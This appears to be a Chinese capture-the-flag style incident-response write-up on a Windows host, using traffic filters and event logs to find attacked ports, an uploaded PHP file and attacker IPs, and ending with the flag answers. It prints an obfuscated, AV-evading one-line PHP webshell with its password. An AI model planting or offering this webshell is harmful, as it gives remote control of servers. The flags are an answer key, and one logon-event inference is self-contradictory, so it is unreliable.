玄机 | Windows应急-应急与研判训练计划 一
1.请找出攻击者攻击成功的端口,如多个端口,则从小到大{x,x,x,}
2.请找出攻击者上传的恶意文件名
3.请找出攻击者最终攻击成功的端口
4.请找出攻击者最终攻击成功端口的IP
5.请找出攻击者最后接管服务器的IP
桌面有FullEventLogView事件日志查看分析工具、cmder第三方终端模拟器、小皮面板、流量包
可以分析流量包,小皮的apache日志为空,nginx中存在access.log
我们也可以把流量包和日志拉到本地方便操作
流量包中统计

猜测192.168.18.133为攻击机 192.168.18.151为靶机
筛选192.168.18.133到192.168.18.151
ip.src==192.168.18.133 && ip.dst==192.168.18.151
统计会话




发现主要大量存在四个端口21,80,3389,8080
逐个对这个四个对口进行流量分析
21端口
ip.src==192.168.18.133 && ip.dst==192.168.18.151 && tcp.dstport==21
追踪流看到230 Logged on 说明登录成功了

80端口
ip.src==192.168.18.133 && ip.dst==192.168.18.151 && tcp.dstport==80
看GET或POST请求 追踪流之后看到404

大量404,并未成功利用
3389端口
ip.src==192.168.18.133 && ip.dst==192.168.18.151 && tcp.dstport==3389
看到有[SYN] [SYN, ACK] [ACK]
有完整的三次握手四次挥手
SYN:想建立连接
SYN‑ACK:同意建立连接
ACK:确认,连接正式可用
FIN:想要关闭连接
这里可以发现是rdp
过滤一下看看
rdp
tcp.port == 3389 && ip.addr == 192.168.18.133

这里强行断开了
查看 Windows 日志 → 安全
并未找到LogonType=10 事件 证明RDP3389 远程桌面登录成功
但是从流量来看确实存在爆破记录
8080端口
ip.src==192.168.18.133 && ip.dst==192.168.18.151 && tcp.dstport==8080

攻击者通过/dede/a/newfile1.php尝试执行phpinfo()
执行失败了 但是确实找到了该文件 说明上传成功了 路径:C:\phpstudy_pro\WWW\decms\a
php7.1可用的一句话免杀马,密码为1
<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);
打开桌面的FullEventLogView 发现192.168.18.1
很可疑 有可能是我们要找的最后接管服务器的IP

1 请找出攻击者攻击成功的端口,如多个端口,则从小到大{x,x,x,} flag{21,3389,8080}
2 请找出攻击者上传的恶意文件名 flag{newfile1.php}
3 请找出攻击者最终攻击成功的端口 flag{3389}
4 请找出攻击者最终攻击成功端口的IP flag{192.168.18.133}
5 请找出攻击者最后接管服务器的IP flag{192.168.18.1}

浙公网安备 33010602011771号